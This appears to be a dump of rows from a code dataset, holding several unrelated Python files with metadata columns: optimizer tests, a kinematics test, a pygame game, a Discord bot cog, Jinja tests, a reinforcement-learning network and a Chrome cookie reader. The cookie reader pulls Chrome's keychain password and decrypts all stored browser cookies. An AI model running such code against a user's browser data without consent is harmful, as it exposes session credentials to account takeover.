clip_grad_norm,
get_optimizer_parameters,
has_overflow,
is_valid_parameters,
neuron_mean,
neuron_norm,
normalize_gradient,
unit_norm,
)
from tests.utils import Example
def test_has_overflow():
assert has_overflow(np.inf)
assert has_overflow(np.nan)
assert not has_overflow(torch.Tensor([1]))
def test_normalized_gradient():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_allclose(
normalize_gradient(x).numpy(),
np.asarray([0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]),
rtol=1e-4,
atol=1e-4,
)
np.testing.assert_allclose(
normalize_gradient(x.view(1, 10), use_channels=True).numpy(),
np.asarray([[0.0000, 0.3303, 0.6606, 0.9909, 1.3212, 1.6514, 1.9817, 2.3120, 2.6423, 2.9726]]),
rtol=1e-4,
atol=1e-4,
)
def test_clip_grad_norm():
x = torch.arange(0, 10, dtype=torch.float32, requires_grad=True)
x.grad = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(clip_grad_norm(x), 16.881943016134134, significant=4)
np.testing.assert_approx_equal(clip_grad_norm(x, max_norm=2), 16.881943016134134, significant=4)
def test_unit_norm():
x = torch.arange(0, 10, dtype=torch.float32)
np.testing.assert_approx_equal(unit_norm(x).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1)).numpy(), 16.8819, significant=4)
np.testing.assert_approx_equal(unit_norm(x.view(1, 10, 1, 1, 1, 1)).numpy(), 16.8819, significant=4)
def test_neuron_mean_norm():
x = torch.arange(-5, 5, dtype=torch.float32)
with pytest.raises(ValueError):
neuron_mean(x)
np.testing.assert_array_equal(
neuron_mean(x.view(-1, 1)).numpy(),
np.asarray([[-5.0], [-4.0], [-3.0], [-2.0], [-1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
np.testing.assert_array_equal(
neuron_norm(x).numpy(), np.asarray([5.0, 4.0, 3.0, 2.0, 1.0, 0.0, 1.0, 2.0, 3.0, 4.0])
)
np.testing.assert_array_equal(
neuron_norm(x.view(-1, 1)).numpy(),
np.asarray([[5.0], [4.0], [3.0], [2.0], [1.0], [0.0], [1.0], [2.0], [3.0], [4.0]]),
)
def test_get_optimizer_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
before_parameters = list(model.named_parameters())
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
for before, after in zip(before_parameters, after_parameters):
layer_name: str = before[0]
if layer_name.find('bias') != -1 or layer_name in wd_ban_list:
assert after['weight_decay'] == 0.0
def test_is_valid_parameters():
model: nn.Module = Example()
wd_ban_list: List[str] = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
after_parameters = get_optimizer_parameters(model, weight_decay=1e-3, wd_ban_list=wd_ban_list)
assert is_valid_parameters(after_parameters)
|
none
| 1
| 2.402151
| 2
|
|
geodeconstructor/tools.py
|
ThomasVieth/geodeconstructor
| 0
|
6628068
|
"""
"""
## python imports
from functools import wraps
## __all__ declaration
__all__ = (
"classproperty",
)
## classproperty declaration
class classproperty(property):
"""A descriptor for a class rather than an object/instance. Used by
decorating an class method with no parameters. Acting similarly to the
property descriptor builtin and uses `functools.wraps` to maintain
documentation.
"""
def __new__(cls, fget=None, doc=None, lazy=False):
if fget is None:
def wrapper(func):
return cls(func, lazy=lazy)
return wrapper
return super().__new__(cls)
def __init__(self, fget, doc=None, lazy=False):
self._lazy = lazy
if lazy:
self._cache = {}
fget = self._wrap_fget(fget)
super().__init__(fget=fget, doc=doc)
def __get__(self, obj, objtype):
if self._lazy and objtype in self._cache:
return self._cache[objtype]
val = self.fget.__wrapped__(objtype)
if self._lazy:
self._cache[objtype] = val
return val
def getter(self, fget):
return super().getter(self._wrap_fget(fget))
@staticmethod
def _wrap_fget(orig_fget):
if isinstance(orig_fget, classmethod):
orig_fget = orig_fget.__func__
@wraps(orig_fget)
def fget(obj):
return orig_fget(obj.__class__)
return fget
|
"""
"""
## python imports
from functools import wraps
## __all__ declaration
__all__ = (
"classproperty",
)
## classproperty declaration
class classproperty(property):
"""A descriptor for a class rather than an object/instance. Used by
decorating an class method with no parameters. Acting similarly to the
property descriptor builtin and uses `functools.wraps` to maintain
documentation.
"""
def __new__(cls, fget=None, doc=None, lazy=False):
if fget is None:
def wrapper(func):
return cls(func, lazy=lazy)
return wrapper
return super().__new__(cls)
def __init__(self, fget, doc=None, lazy=False):
self._lazy = lazy
if lazy:
self._cache = {}
fget = self._wrap_fget(fget)
super().__init__(fget=fget, doc=doc)
def __get__(self, obj, objtype):
if self._lazy and objtype in self._cache:
return self._cache[objtype]
val = self.fget.__wrapped__(objtype)
if self._lazy:
self._cache[objtype] = val
return val
def getter(self, fget):
return super().getter(self._wrap_fget(fget))
@staticmethod
def _wrap_fget(orig_fget):
if isinstance(orig_fget, classmethod):
orig_fget = orig_fget.__func__
@wraps(orig_fget)
def fget(obj):
return orig_fget(obj.__class__)
return fget
|
en
| 0.687564
|
## python imports ## __all__ declaration ## classproperty declaration A descriptor for a class rather than an object/instance. Used by decorating an class method with no parameters. Acting similarly to the property descriptor builtin and uses `functools.wraps` to maintain documentation.
| 3.268927
| 3
|
src/ll4ma_kdl/scripts/test_hand_model.py
|
NYU-robot-learning/Allegro-Hand-Controller-DIME
| 0
|
6628069
|
<reponame>NYU-robot-learning/Allegro-Hand-Controller-DIME
import numpy as np
from handModel import HandModel
from scipy.spatial.transform import Rotation as R
def test_hand_model_FK():
model = HandModel("allegro/robot_description")
q = np.array([0.1, 0.1, 0.1, 0.1]).T
# 2 denotes RING finger
fk = model.FK(q, 2) # 4x4 matrix
assert fk.shape == (4,4)
position = np.squeeze(fk[0:3,3]).T
assert abs(position[0,0] - 0.03917029) < 1e-4
assert abs(position[1,0] - (-0.05071672)) < 1e-4
assert abs(position[2,0] - 0.14898276) < 1e-4
print("FK is correct")
# fk for biotac origin must be different
fk_origin = model.FK(q, 2,"ring_biotac_origin")
position_origin = np.squeeze(fk_origin[0:3,3]).T
assert abs(position_origin[0,0] - position[0,0]) > 1e-4
assert abs(position_origin[1,0] - position[1,0]) > 1e-4
assert abs(position_origin[2,0] - position[2,0]) > 1e-4
print("chains to origins are constructed as well")
# test jacobians
q_1 = q
q_2 = np.array([1e-2 + q_1[i] for i in range(4)]).T
delta_q = q_2 - q_1
fk_2 = model.FK(q_2, 2)
fk_1 = model.FK(q_1,2) # 4x4 matrix
position = np.squeeze(fk_2[0:3,3]).T - np.squeeze(fk_1[0:3,3]).T
rotation = R.from_dcm(fk_2[:3,:3]).as_euler("xyz").T - R.from_dcm(fk_1[:3,:3]).as_euler("xyz").T
rotation = np.expand_dims(rotation,1)
delta_x = np.vstack((position,rotation))
j = model.Jacobian(q_2, 2)
print("j dot delta_q: ", np.dot(j, delta_q))
print("delta_x: ", delta_x)
def main():
test_hand_model_FK()
if __name__ == "__main__":
main()
|
import numpy as np
from handModel import HandModel
from scipy.spatial.transform import Rotation as R
def test_hand_model_FK():
model = HandModel("allegro/robot_description")
q = np.array([0.1, 0.1, 0.1, 0.1]).T
# 2 denotes RING finger
fk = model.FK(q, 2) # 4x4 matrix
assert fk.shape == (4,4)
position = np.squeeze(fk[0:3,3]).T
assert abs(position[0,0] - 0.03917029) < 1e-4
assert abs(position[1,0] - (-0.05071672)) < 1e-4
assert abs(position[2,0] - 0.14898276) < 1e-4
print("FK is correct")
# fk for biotac origin must be different
fk_origin = model.FK(q, 2,"ring_biotac_origin")
position_origin = np.squeeze(fk_origin[0:3,3]).T
assert abs(position_origin[0,0] - position[0,0]) > 1e-4
assert abs(position_origin[1,0] - position[1,0]) > 1e-4
assert abs(position_origin[2,0] - position[2,0]) > 1e-4
print("chains to origins are constructed as well")
# test jacobians
q_1 = q
q_2 = np.array([1e-2 + q_1[i] for i in range(4)]).T
delta_q = q_2 - q_1
fk_2 = model.FK(q_2, 2)
fk_1 = model.FK(q_1,2) # 4x4 matrix
position = np.squeeze(fk_2[0:3,3]).T - np.squeeze(fk_1[0:3,3]).T
rotation = R.from_dcm(fk_2[:3,:3]).as_euler("xyz").T - R.from_dcm(fk_1[:3,:3]).as_euler("xyz").T
rotation = np.expand_dims(rotation,1)
delta_x = np.vstack((position,rotation))
j = model.Jacobian(q_2, 2)
print("j dot delta_q: ", np.dot(j, delta_q))
print("delta_x: ", delta_x)
def main():
test_hand_model_FK()
if __name__ == "__main__":
main()
|
en
| 0.716927
|
# 2 denotes RING finger # 4x4 matrix # fk for biotac origin must be different # test jacobians # 4x4 matrix
| 2.342401
| 2
|
src/pyfuncs/chrome_cookie.py
|
fishs-x/pyfuncs
| 0
|
6628070
|
import sys
import sqlite3
import getpass
import logging
import keyring
from itertools import chain
from typing import Iterator
from urllib.parse import urlparse
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
class ChromeCookie:
"""
creation_utc:Cookie产生的utc时间
host_key:Cookie所在的网页(domain)
name:Cookie名称
value:不加密的Cookie值,由于Chrome几乎都会对Cookie值加密后再存储,因此这个字段基本都是空的
path:如果服务器需要设置Cookies,那么服务器在响应浏览器请求的时候会返回Set-Cookie的响应,并且附带所要设置的Cookies,这里的path的默认值就是返回Set-Cookie的那个页面。path以'/'为开头。
expires_utc:Cookie的有效期限
is_secure:指示在浏览器与服务器之间传输该Cookie时需要采用加密通道,即https
is_httponly:当设置了该值为1时,在浏览器上运行的JS不能读取到该Cookie,该Cookie只能由http请求读取。这个标记主要目的是提高Cookie的安全性,防止无关的JS脚本窃取Cookie中的重要信息
last_access_utc:上一次访问到该Cookie的时间
has_expires:Cookie的期限是否有效
is_persistent:如果expires_utc不为0,那么这个值为1
priority:Cookie的删除优先级,Cookie也有存储上限的,当超出上限则需要删除,此时会有特定的删除策略来删除不同priority的Cookie
encrypted_value:加密后的Cookie值
firstpartyonly:first-party以及third-party是HTTP Request的一种分类,\
"""
def __init__(self):
self.iterations = None
self.my_pass = None
self.cookie_path = None
self.connect = None
self.logger = None
self.decryptor = None
def _init_sqlite3_connect(self) -> None:
"""获取sqlite连接"""
if not self.cookie_path:
raise Exception("not find cookie_path")
connect = sqlite3.connect(self.cookie_path)
connect.row_factory = dict_factory
self.connect = connect
def init_by_system(self) -> None:
"""根据系统初始化参数"""
self.logger = logging.getLogger(__name__)
if sys.platform == 'darwin':
self._init_for_mac()
elif sys.platform == 'linux':
self._init_for_linux()
else:
raise Exception("不支持{}系统".format(sys.platform))
self._init_decryptor()
self._init_sqlite3_connect()
def _init_for_linux(self) -> None:
"""Linux初始化参数、"""
self.iterations = 1
self.cookie_path = "~/.config/chromium/Default/Cookies"
self.my_pass = '<PASSWORD>'.encode('utf8')
def _init_for_mac(self) -> None:
"""Mac初始化参数、"""
self.iterations = 1003
user = getpass.getuser()
self.cookie_path = "/Users/{}/Library/Application Support/Google/Chrome/Default/Cookies".format(
user)
self.my_pass = keyring.get_password(
'Chrome Safe Storage', 'Chrome').encode("utf8")
def _init_decryptor(self) -> None:
"""初始化Cipher 解密时使用"""
enc_key = PBKDF2HMAC(
algorithm=SHA1(),
backend=default_backend(),
iterations=self.iterations,
length=16,
salt=b"saltysalt",
).derive(self.my_pass)
self.cipher = Cipher(algorithm=AES(enc_key), mode=CBC(
b" " * 16), backend=default_backend())
@staticmethod
def clean(decrypted: bytes) -> str:
"""清除格式"""
last = decrypted[-1]
if isinstance(last, int):
return decrypted[:-last].decode("utf8")
return decrypted[: -ord(last)].decode("utf8")
def encrypted_value_decrypt(self, encrypted_value: bytes) -> str:
"""chome cookie encrypted_value解密"""
encrypted_value = encrypted_value[3:]
decryptor = self.cipher.decryptor()
return self.clean(decryptor.update(encrypted_value) + decryptor.finalize())
def execute(self, sql: str) -> Iterator:
"""执行sql"""
self.logger.info("execute sql: {}".format(sql))
cursor = self.connect.cursor()
for row in cursor.execute(sql):
value = self.encrypted_value_decrypt(
row.get('encrypted_value'))
row['value'] = value
yield row
cursor.close()
@classmethod
def _get_host_name(cls, host: str) -> str:
"""获取域名
example.com
.example.com
foo.example.com
.foo.example.com
"""
hostname = urlparse(host).hostname
if not hostname:
yield host
yield "." + host
return
hostname_list = hostname.split('.')
for i in range(2, len(hostname_list) + 1):
domain = ".".join(hostname_list[-i:])
yield domain
yield "." + domain
def get_cookie_by_host(self, host: str) -> Iterator[str]:
"""获取cookie
"""
result = []
cookies = {}
for host_name in self._get_host_name(host):
sql = 'select * from cookies where host_key like "%{host_name}%";'.format(host_name=host_name)
result.append(self.execute(sql))
for item in chain(*result):
cookies.setdefault(item['name'], item['value'])
return cookies
def get_cookie_by_sql(self, sql):
cookies = {}
for item in self.execute(sql=sql):
cookies.setdefault(item['name'], item['value'])
return cookies
def __enter__(self):
self.init_by_system()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.connect.close()
|
import sys
import sqlite3
import getpass
import logging
import keyring
from itertools import chain
from typing import Iterator
from urllib.parse import urlparse
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers import Cipher
from cryptography.hazmat.primitives.ciphers.algorithms import AES
from cryptography.hazmat.primitives.ciphers.modes import CBC
from cryptography.hazmat.primitives.hashes import SHA1
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
def dict_factory(cursor, row):
d = {}
for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
class ChromeCookie:
"""
creation_utc:Cookie产生的utc时间
host_key:Cookie所在的网页(domain)
name:Cookie名称
value:不加密的Cookie值,由于Chrome几乎都会对Cookie值加密后再存储,因此这个字段基本都是空的
path:如果服务器需要设置Cookies,那么服务器在响应浏览器请求的时候会返回Set-Cookie的响应,并且附带所要设置的Cookies,这里的path的默认值就是返回Set-Cookie的那个页面。path以'/'为开头。
expires_utc:Cookie的有效期限
is_secure:指示在浏览器与服务器之间传输该Cookie时需要采用加密通道,即https
is_httponly:当设置了该值为1时,在浏览器上运行的JS不能读取到该Cookie,该Cookie只能由http请求读取。这个标记主要目的是提高Cookie的安全性,防止无关的JS脚本窃取Cookie中的重要信息
last_access_utc:上一次访问到该Cookie的时间
has_expires:Cookie的期限是否有效
is_persistent:如果expires_utc不为0,那么这个值为1
priority:Cookie的删除优先级,Cookie也有存储上限的,当超出上限则需要删除,此时会有特定的删除策略来删除不同priority的Cookie
encrypted_value:加密后的Cookie值
firstpartyonly:first-party以及third-party是HTTP Request的一种分类,\
"""
def __init__(self):
self.iterations = None
self.my_pass = None
self.cookie_path = None
self.connect = None
self.logger = None
self.decryptor = None
def _init_sqlite3_connect(self) -> None:
"""获取sqlite连接"""
if not self.cookie_path:
raise Exception("not find cookie_path")
connect = sqlite3.connect(self.cookie_path)
connect.row_factory = dict_factory
self.connect = connect
def init_by_system(self) -> None:
"""根据系统初始化参数"""
self.logger = logging.getLogger(__name__)
if sys.platform == 'darwin':
self._init_for_mac()
elif sys.platform == 'linux':
self._init_for_linux()
else:
raise Exception("不支持{}系统".format(sys.platform))
self._init_decryptor()
self._init_sqlite3_connect()
def _init_for_linux(self) -> None:
"""Linux初始化参数、"""
self.iterations = 1
self.cookie_path = "~/.config/chromium/Default/Cookies"
self.my_pass = '<PASSWORD>'.encode('utf8')
def _init_for_mac(self) -> None:
"""Mac初始化参数、"""
self.iterations = 1003
user = getpass.getuser()
self.cookie_path = "/Users/{}/Library/Application Support/Google/Chrome/Default/Cookies".format(
user)
self.my_pass = keyring.get_password(
'Chrome Safe Storage', 'Chrome').encode("utf8")
def _init_decryptor(self) -> None:
"""初始化Cipher 解密时使用"""
enc_key = PBKDF2HMAC(
algorithm=SHA1(),
backend=default_backend(),
iterations=self.iterations,
length=16,
salt=b"saltysalt",
).derive(self.my_pass)
self.cipher = Cipher(algorithm=AES(enc_key), mode=CBC(
b" " * 16), backend=default_backend())
@staticmethod
def clean(decrypted: bytes) -> str:
"""清除格式"""
last = decrypted[-1]
if isinstance(last, int):
return decrypted[:-last].decode("utf8")
return decrypted[: -ord(last)].decode("utf8")
def encrypted_value_decrypt(self, encrypted_value: bytes) -> str:
"""chome cookie encrypted_value解密"""
encrypted_value = encrypted_value[3:]
decryptor = self.cipher.decryptor()
return self.clean(decryptor.update(encrypted_value) + decryptor.finalize())
def execute(self, sql: str) -> Iterator:
"""执行sql"""
self.logger.info("execute sql: {}".format(sql))
cursor = self.connect.cursor()
for row in cursor.execute(sql):
value = self.encrypted_value_decrypt(
row.get('encrypted_value'))
row['value'] = value
yield row
cursor.close()
@classmethod
def _get_host_name(cls, host: str) -> str:
"""获取域名
example.com
.example.com
foo.example.com
.foo.example.com
"""
hostname = urlparse(host).hostname
if not hostname:
yield host
yield "." + host
return
hostname_list = hostname.split('.')
for i in range(2, len(hostname_list) + 1):
domain = ".".join(hostname_list[-i:])
yield domain
yield "." + domain
def get_cookie_by_host(self, host: str) -> Iterator[str]:
"""获取cookie
"""
result = []
cookies = {}
for host_name in self._get_host_name(host):
sql = 'select * from cookies where host_key like "%{host_name}%";'.format(host_name=host_name)
result.append(self.execute(sql))
for item in chain(*result):
cookies.setdefault(item['name'], item['value'])
return cookies
def get_cookie_by_sql(self, sql):
cookies = {}
for item in self.execute(sql=sql):
cookies.setdefault(item['name'], item['value'])
return cookies
def __enter__(self):
self.init_by_system()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.connect.close()
|
zh
| 0.872779
|
creation_utc:Cookie产生的utc时间 host_key:Cookie所在的网页(domain) name:Cookie名称 value:不加密的Cookie值,由于Chrome几乎都会对Cookie值加密后再存储,因此这个字段基本都是空的 path:如果服务器需要设置Cookies,那么服务器在响应浏览器请求的时候会返回Set-Cookie的响应,并且附带所要设置的Cookies,这里的path的默认值就是返回Set-Cookie的那个页面。path以'/'为开头。 expires_utc:Cookie的有效期限 is_secure:指示在浏览器与服务器之间传输该Cookie时需要采用加密通道,即https is_httponly:当设置了该值为1时,在浏览器上运行的JS不能读取到该Cookie,该Cookie只能由http请求读取。这个标记主要目的是提高Cookie的安全性,防止无关的JS脚本窃取Cookie中的重要信息 last_access_utc:上一次访问到该Cookie的时间 has_expires:Cookie的期限是否有效 is_persistent:如果expires_utc不为0,那么这个值为1 priority:Cookie的删除优先级,Cookie也有存储上限的,当超出上限则需要删除,此时会有特定的删除策略来删除不同priority的Cookie encrypted_value:加密后的Cookie值 firstpartyonly:first-party以及third-party是HTTP Request的一种分类,\ 获取sqlite连接 根据系统初始化参数 Linux初始化参数、 Mac初始化参数、 初始化Cipher 解密时使用 清除格式 chome cookie encrypted_value解密 执行sql 获取域名 example.com .example.com foo.example.com .foo.example.com 获取cookie
| 2.061282
| 2
|
flappybird.py
|
karangandhi272/Flappy-ball
| 0
|
6628071
|
<filename>flappybird.py
import pygame
import random
pygame.init()
pygame.font.init()
pygame.display.set_caption("Flappy Ball")
screen = pygame.display.set_mode((400, 600))
scorefont = pygame.font.SysFont('Comic Sans MS', 15)
def main():
global z
global score
global y
global spacecount
global highscore
score = 0
highscore = 0
restart()
while True:
screen.fill((255,255,255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
y -= 60
z = pygame.time.get_ticks()/1000
displacement = y
spacecount += 1
if spacecount > 0:
time = pygame.time.get_ticks()/1000 + 1 - z
y = (30 * time * time) + displacement
if y < 0 or y > 570:
restart()
bar1.barx = 430
bar2.barx = 630
bar1.barmechanics()
bar1.y = y
bar1.spaces = spacecount
bar2.barmechanics()
bar2.y = y
bar2.spaces = spacecount
scoretext = scorefont.render(f'score: {score}', False, (0, 0, 0))
highscoretext = scorefont.render(f'highscore: {highscore}', False, (0, 0, 0,))
pygame.draw.circle(screen,(0,0,0),(200,y),10)
screen.blit(scoretext,(330,0))
screen.blit(highscoretext,(0,0))
pygame.display.update()
class bar:
def __init__(self,barx,y,spacecount):
self.barx = barx
self.bar1y = random.randint(100,500)
self.bar2y = self.bar1y + 100
self.y = y
self.start = barx
self.spaces = spacecount
def barmechanics(self):
global score
global loop
if self.barx < -20:
self.barx = 430
self.bar1y = random.randint(50,550)
self.bar2y = self.bar1y + 90
loop += 1
if self.spaces > 0:
self.barx -= 0.08
if self.barx < 190:
score = loop
if self.barx < 210 and self.barx > 190:
if self.y < self.bar1y or self.y > self.bar2y:
self.barx = self.start
restart()
pygame.draw.rect(screen,(0,0,0),(self.barx,0,30,self.bar1y))
pygame.draw.rect(screen,(0,0,0),(self.barx,self.bar2y,30,600 - self.bar2y))
def restart():
global z
global score
global y
global spacecount
global time
global displacement
global bar1
global bar2
global highscore
global loop
if score > highscore:
highscore = score
z = 0
score = 0
y = 290
spacecount = 0
time = 0
displacement = 0
loop = 1
bar1 = bar(430,y,spacecount)
bar2 = bar(630,y,spacecount)
if __name__ == '__main__':
main()
|
<filename>flappybird.py
import pygame
import random
pygame.init()
pygame.font.init()
pygame.display.set_caption("Flappy Ball")
screen = pygame.display.set_mode((400, 600))
scorefont = pygame.font.SysFont('Comic Sans MS', 15)
def main():
global z
global score
global y
global spacecount
global highscore
score = 0
highscore = 0
restart()
while True:
screen.fill((255,255,255))
for event in pygame.event.get():
if event.type == pygame.QUIT:
return
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
y -= 60
z = pygame.time.get_ticks()/1000
displacement = y
spacecount += 1
if spacecount > 0:
time = pygame.time.get_ticks()/1000 + 1 - z
y = (30 * time * time) + displacement
if y < 0 or y > 570:
restart()
bar1.barx = 430
bar2.barx = 630
bar1.barmechanics()
bar1.y = y
bar1.spaces = spacecount
bar2.barmechanics()
bar2.y = y
bar2.spaces = spacecount
scoretext = scorefont.render(f'score: {score}', False, (0, 0, 0))
highscoretext = scorefont.render(f'highscore: {highscore}', False, (0, 0, 0,))
pygame.draw.circle(screen,(0,0,0),(200,y),10)
screen.blit(scoretext,(330,0))
screen.blit(highscoretext,(0,0))
pygame.display.update()
class bar:
def __init__(self,barx,y,spacecount):
self.barx = barx
self.bar1y = random.randint(100,500)
self.bar2y = self.bar1y + 100
self.y = y
self.start = barx
self.spaces = spacecount
def barmechanics(self):
global score
global loop
if self.barx < -20:
self.barx = 430
self.bar1y = random.randint(50,550)
self.bar2y = self.bar1y + 90
loop += 1
if self.spaces > 0:
self.barx -= 0.08
if self.barx < 190:
score = loop
if self.barx < 210 and self.barx > 190:
if self.y < self.bar1y or self.y > self.bar2y:
self.barx = self.start
restart()
pygame.draw.rect(screen,(0,0,0),(self.barx,0,30,self.bar1y))
pygame.draw.rect(screen,(0,0,0),(self.barx,self.bar2y,30,600 - self.bar2y))
def restart():
global z
global score
global y
global spacecount
global time
global displacement
global bar1
global bar2
global highscore
global loop
if score > highscore:
highscore = score
z = 0
score = 0
y = 290
spacecount = 0
time = 0
displacement = 0
loop = 1
bar1 = bar(430,y,spacecount)
bar2 = bar(630,y,spacecount)
if __name__ == '__main__':
main()
|
none
| 1
| 3.250999
| 3
|
|
cogs/welcome_goodbye.py
|
nikhilvayeda/Bhendi-Bot-3
| 8
|
6628072
|
<filename>cogs/welcome_goodbye.py<gh_stars>1-10
import discord
from discord.ext import commands
import Constants as consts
class Others_welcome_goodbye(commands.Cog):
def __init__(self, client):
self.client = client
self.channel = None
@commands.Cog.listener()
async def on_member_join(self, member):
'''when a member joins the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title="New Member!", color=discord.Colour.blue())
_embed.add_field(name=f"Hello", value=f"""Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}>""" )
_embed.add_field(name="Member Count", value=f"#{_total_member + 1} members")
_embed.set_image(url="https://cdn.discordapp.com/attachments/722370864229646377/733302632977924146/image0.gif")
await self.channel.send(member.mention, embed=_embed)
@commands.Cog.listener()
async def on_member_remove(self, member):
'''when a member leaves the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title=f"{member} has left the server. Can we get some F please", color=discord.Colour.red())
_embed.set_image(url="https://cdn.discordapp.com/attachments/729979069248176162/731784988009168906/image0.gif")
await self.channel.send(embed=_embed)
def count_total_members(self):
return len([m for m in self.channel.guild.members if not m.bot])
def setup(client):
client.add_cog(Others_welcome_goodbye(client))
|
<filename>cogs/welcome_goodbye.py<gh_stars>1-10
import discord
from discord.ext import commands
import Constants as consts
class Others_welcome_goodbye(commands.Cog):
def __init__(self, client):
self.client = client
self.channel = None
@commands.Cog.listener()
async def on_member_join(self, member):
'''when a member joins the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title="New Member!", color=discord.Colour.blue())
_embed.add_field(name=f"Hello", value=f"""Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}>""" )
_embed.add_field(name="Member Count", value=f"#{_total_member + 1} members")
_embed.set_image(url="https://cdn.discordapp.com/attachments/722370864229646377/733302632977924146/image0.gif")
await self.channel.send(member.mention, embed=_embed)
@commands.Cog.listener()
async def on_member_remove(self, member):
'''when a member leaves the server'''
if self.channel == None:
self.channel = self.client.get_channel(consts.CHANNEL_IDS["WELCOME_GOODBYE"])
_total_member = self.count_total_members()
_embed = discord.Embed(title=f"{member} has left the server. Can we get some F please", color=discord.Colour.red())
_embed.set_image(url="https://cdn.discordapp.com/attachments/729979069248176162/731784988009168906/image0.gif")
await self.channel.send(embed=_embed)
def count_total_members(self):
return len([m for m in self.channel.guild.members if not m.bot])
def setup(client):
client.add_cog(Others_welcome_goodbye(client))
|
en
| 0.857596
|
when a member joins the server Hello {member.mention}!({member}), Welcome to Say Station. \n
Be sure to read the rules in <#{consts.CHANNEL_IDS['RULES']}>. Go have a chat with the members in <#{consts.CHANNEL_IDS['GENERAL']}> when a member leaves the server
| 2.964902
| 3
|
grow/templates/tests.py
|
akashkalal/grow
| 335
|
6628073
|
"""Template jinja tests."""
def is_subset_of(value, subset):
"""Check if a variable is a subset."""
return set(value) >= set(subset)
def is_superset_of(value, superset):
"""Check if a variable is a superset."""
return set(value) <= set(superset)
def create_builtin_tests():
"""Tests standard for the template rendering."""
return (
('subset', is_subset_of),
('superset', is_superset_of),
)
|
"""Template jinja tests."""
def is_subset_of(value, subset):
"""Check if a variable is a subset."""
return set(value) >= set(subset)
def is_superset_of(value, superset):
"""Check if a variable is a superset."""
return set(value) <= set(superset)
def create_builtin_tests():
"""Tests standard for the template rendering."""
return (
('subset', is_subset_of),
('superset', is_superset_of),
)
|
en
| 0.591444
|
Template jinja tests. Check if a variable is a subset. Check if a variable is a superset. Tests standard for the template rendering.
| 2.387294
| 2
|
p1_navigation/QNetwork.py
|
asolis345/Udacity_RL
| 0
|
6628074
|
<reponame>asolis345/Udacity_RL
import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
"""Actor (Policy) Model."""
def __init__(self, state_size, action_size, layers, seed, dropout=0.2, use_l_relu=False):
"""Initialize parameters and build model.
Params
======
state_size (int): Dimension of each state
action_size (int): Dimension of each action
seed (int): Random seed
"""
super(QNetwork, self).__init__()
self.seed = torch.manual_seed(seed)
"*** YOUR CODE HERE ***"
self.drop_rate = dropout
self.use_l_relu = use_l_relu
self.state_size = state_size
self.action_size = action_size
self.tmp_layers = [nn.Linear(state_size, layers[0])]
self._add_activation_function(use_l_relu, self.tmp_layers)
for i, _ in enumerate(layers):
if i < len(layers) -1:
self.tmp_layers.append(nn.Linear(layers[i], layers[i+1]))
self._add_activation_function(use_l_relu, self.tmp_layers)
else:
self.tmp_layers.append(nn.Linear(layers[i], action_size))
self.layers = nn.Sequential(*self.tmp_layers)
self.droput = nn.Dropout(self.drop_rate)
def forward(self, state):
"""Build a network that maps state -> action values."""
x = torch.sigmoid(self.layers(state))
return x
def _add_activation_function(self, use_l_relu, layers):
if use_l_relu:
self.tmp_layers.append(nn.LeakyReLU())
else:
self.tmp_layers.append(nn.ReLU())
def print_parameters(self, episode):
with open(str(f'model_weights_{episode}.txt'), 'a') as fp:
for name, param in self.named_parameters():
print(f'Name: {name}\tParam: {param}', file=fp)
print('{}'.format('='*40), file=fp)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class QNetwork(nn.Module):
"""Actor (Policy) Model."""
def __init__(self, state_size, action_size, layers, seed, dropout=0.2, use_l_relu=False):
"""Initialize parameters and build model.
Params
======
state_size (int): Dimension of each state
action_size (int): Dimension of each action
seed (int): Random seed
"""
super(QNetwork, self).__init__()
self.seed = torch.manual_seed(seed)
"*** YOUR CODE HERE ***"
self.drop_rate = dropout
self.use_l_relu = use_l_relu
self.state_size = state_size
self.action_size = action_size
self.tmp_layers = [nn.Linear(state_size, layers[0])]
self._add_activation_function(use_l_relu, self.tmp_layers)
for i, _ in enumerate(layers):
if i < len(layers) -1:
self.tmp_layers.append(nn.Linear(layers[i], layers[i+1]))
self._add_activation_function(use_l_relu, self.tmp_layers)
else:
